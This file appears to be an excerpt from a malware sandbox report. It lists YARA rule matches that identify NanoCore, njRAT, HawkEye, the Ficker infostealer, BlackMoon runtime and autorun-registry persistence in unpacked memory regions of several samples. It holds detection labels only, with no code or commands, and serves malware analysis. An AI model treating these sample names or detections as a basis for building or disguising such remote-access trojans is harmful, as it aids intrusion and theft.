                    Source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE; Matched rule: NanoCore; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE; Matched rule: NanoCore; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 17.2.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 17.2.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 11.0.22.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 9.2.Opus.exe.3edeacc.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 9.2.Opus.exe.3edeacc.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.c8867b.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
                    Source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.9.unpack, type: UNPACKEDPE; Matched rule: Detects Ficker infostealer; Author: ditekSHen
                    Source: 11.0.22.exe.43de6f.13.unpack, type: UNPACKEDPE; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPE; Matched rule: NanoCore; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.gay.exe.d0000.1.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 8.0.gay.exe.d0000.1.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 8.0.gay.exe.d0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 8.0.gay.exe.d0000.0.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPE; Matched rule: NanoCore; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 11.0.22.exe.530edf.11.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
                    Source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 4.2.healastounding.exe.34865dc.7.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 4.2.healastounding.exe.34865dc.7.raw.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 9.2.Opus.exe.5870000.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 9.2.Opus.exe.5870000.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE; Matched rule: NanoCore; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 5.0.Pluto Panel.exe.f6fa72.13.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f6fa72.13.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 11.0.22.exe.5f65b6.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.d4dd52.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.c8867b.4.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.c8867b.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 4.0.healastounding.exe.95312e.2.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.2.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 9.2.Opus.exe.3edeacc.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.2.Opus.exe.3edeacc.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 9.2.Opus.exe.3ee30f5.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.2.Opus.exe.3ee30f5.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.7.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.7.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 5.0.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 5.0.Pluto Panel.exe.f6fa72.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f6fa72.9.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 17.0.mediaget.exe.ab0000.1.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 17.0.mediaget.exe.ab0000.1.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 11.0.22.exe.43de6f.7.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.13.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.13.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.18.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 11.0.22.exe.400000.18.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 5.0.Pluto Panel.exe.f6fa72.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f6fa72.7.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 11.0.22.exe.530edf.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5839748.8.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 6.0.test.exe.da0000.2.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 11.0.22.exe.530edf.22.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.d4dd52.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.c8867b.4.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 11.0.22.exe.530edf.16.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 6.0.test.exe.da0000.3.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5731eca.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5731eca.7.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5707591.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5707591.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 5.0.Pluto Panel.exe.f19c0d.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f19c0d.6.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5a2fcfe.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 5.0.Pluto Panel.exe.f19c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f19c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 11.0.22.exe.530edf.11.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.19.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 9.2.Opus.exe.5b04629.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.2.Opus.exe.5b04629.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 15.2.0fd7de5367376231a788872005d7ed4f.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.59c8085.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 7.2.0fd7de5367376231a788872005d7ed4f.exe.24f15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 17.0.mediaget.exe.ab0000.2.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 17.0.mediaget.exe.ab0000.2.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 8.0.gay.exe.d0000.3.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 8.0.gay.exe.d0000.3.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.2.healastounding.exe.3479694.5.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 6.0.test.exe.da0000.1.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5725596.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5725596.2.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
